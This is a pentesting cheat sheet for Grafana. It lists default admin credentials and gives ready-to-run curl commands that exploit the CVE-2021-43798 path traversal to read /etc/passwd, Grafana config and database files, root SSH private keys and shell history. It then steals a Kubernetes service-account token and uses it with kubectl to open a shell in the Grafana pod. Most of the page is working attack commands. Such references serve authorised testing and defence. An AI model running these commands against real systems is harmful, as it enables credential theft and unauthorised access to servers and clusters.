Grafana Pentesting

Grafana is a multi-platform analytics and interactive visualization web application.

Default Credential

admin:admin
admin:prom-operator

Configuration File

The configuration file contains the admin credentials. See the “admin_user” and “admin_password” section in the file.

/etc/grafana/grafana.ini

Path Traversal

curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/passwd -o passwd
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../root/.bash_history
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.ssh/id_rsa
curl --path-as-is http://vulnerable.com:3000/public/plugins/alertlist/../../../../../../../../home/grafana/.bash_history

Getting a Shell vis JWT, Grafana Pod

Some Grafana versions are vulnerable to Path Traversal. Kubernetes creates environment variables by default.

1. Check Environment Variables on the Target Machine

env

If you got the GRAFANA environment like the following, the Grafana service is running on the cluster.

GRAFANA_SERVICE_HOST=10.108.133.228
GRAFANA_PORT=tcp://10.108.133.228:3000
GRAFANA_PORT_3000_TCP=tcp://10.108.133.228:3000

2. Access the Grafana Dashboard

You can access the service at http://\:\.

3. Get the JWT of the Service Account

Using Path Traversal (CVE-2021-43798).

curl --path-as-is http://<grafana-ip>:<grafana-port>/public/plugins/alertlist/../../../../../../../../etc/passwd

Get the token (JWT) of the service account.

curl --path-as-is http://grafana:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token

4. Decode the JWT and Get Sensitive Information

See JWT Pentesting.

5. Check Your Permission of This Service

Using the JWT, you should get permissions.

kubectl auth can-i --list --token=<Grafana-JWT>

# List pods
kubectl get pods --token=<JWT>

6. Get a Shell on the Grafana Pod

kubectl exec -it <grafana-pod-name> --token=<Grafana-JWT> -- /bin/bash